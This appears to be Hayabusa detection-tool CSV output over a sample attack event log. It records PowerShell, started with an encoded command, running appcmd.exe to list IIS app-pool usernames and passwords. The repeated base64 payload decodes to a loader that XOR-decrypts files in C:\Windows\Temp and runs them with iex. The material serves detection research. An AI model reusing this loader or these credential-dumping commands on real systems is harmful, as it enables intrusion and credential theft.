JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3484 | PGUID: 365ABB72-3D6C-5CEB-0000-00107257FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.110 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2644 | PGUID: 365ABB72-3D6D-5CEB-0000-0010575CFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.190 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2104 | PGUID: 365ABB72-3D6D-5CEB-0000-00101760FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.270 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3240 | PGUID: 365ABB72-3D6D-5CEB-0000-0010D763FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.350 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3096 | PGUID: 365ABB72-3D6D-5CEB-0000-00109767FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.581 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2928 | PGUID: 365ABB72-3D6D-5CEB-0000-0010576BFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.661 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1340 | PGUID: 365ABB72-3D6D-5CEB-0000-00108270FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.731 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2448 | PGUID: 365ABB72-3D6D-5CEB-0000-00104474FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.811 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3444 | PGUID: 365ABB72-3D6D-5CEB-0000-00100478FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.891 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 560 | PGUID: 365ABB72-3D6D-5CEB-0000-0010C47BFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.971 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3196 | PGUID: 365ABB72-3D6D-5CEB-0000-00108C7FFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.041 
+09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2472 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C83FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.121 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2896 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C87FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.202 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2524 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC8AFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.282 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" 
list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3144 | PGUID: 365ABB72-3D6E-5CEB-0000-00108C8EFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.352 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3100 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C92FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.432 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3136 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C96FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.522 +09:00,IEWIN7,1,info,,Process 
Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 344 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC99FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.662 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0A
IAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3756 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EF9EFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.742 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". 
)"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3812 | PGUID: 365ABB72-3D6E-5CEB-0000-0010AFA2FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.822 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1876 | PGUID: 365ABB72-3D6E-5CEB-0000-00106FA6FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.893 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
